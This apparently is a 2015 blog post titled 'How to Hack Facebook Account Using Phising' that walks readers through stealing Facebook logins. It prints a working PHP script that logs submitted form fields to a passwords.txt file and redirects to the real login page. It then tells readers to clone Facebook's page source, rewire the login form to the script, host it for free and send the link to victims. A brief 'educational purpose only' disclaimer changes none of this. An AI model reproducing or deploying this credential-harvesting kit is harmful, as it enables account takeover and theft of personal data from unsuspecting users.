Sunday 12 July 2015

How to Hack Facebook Account Using Phising

Hey Guys. After a long 7 months time i'm back with new and common hack which is facebook hack.
Many of you dont know what is facebook hack so you go around the web searching for facebook hack and end up being installed virus in your computer.

I will teach you exact phising technique which is really easy and dont require hacking or coding knowledge. now lets learn ;)

First, what is phising?

Phising is a technique where attacker need to fool target ( victim ) to input their real information in phising page which looks 100% same as real facebook page.



Creating Phising Page :

You need to open any text editor and input the following code.

:<?php
header("Location: https://www.facebook.com/login.php");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

?> 

You got your php file ready now lets clone facebook login page

Now go to facebook and select view page source and copy the whole code and put it in the text editor and change the following login code to your php script.

Now go to any free hosting sites, register there and upload your fake files and send the url to the victim ( target ) and let him to log in to the facebook, you will get the password in the file manager that is in control panel. 

Disclaimer : i'm not responsible for your any acts you do after learning at our blog, which held no responsibility of users. this is for educational purpose only.

Have a nice day! Cheers!

3 comments: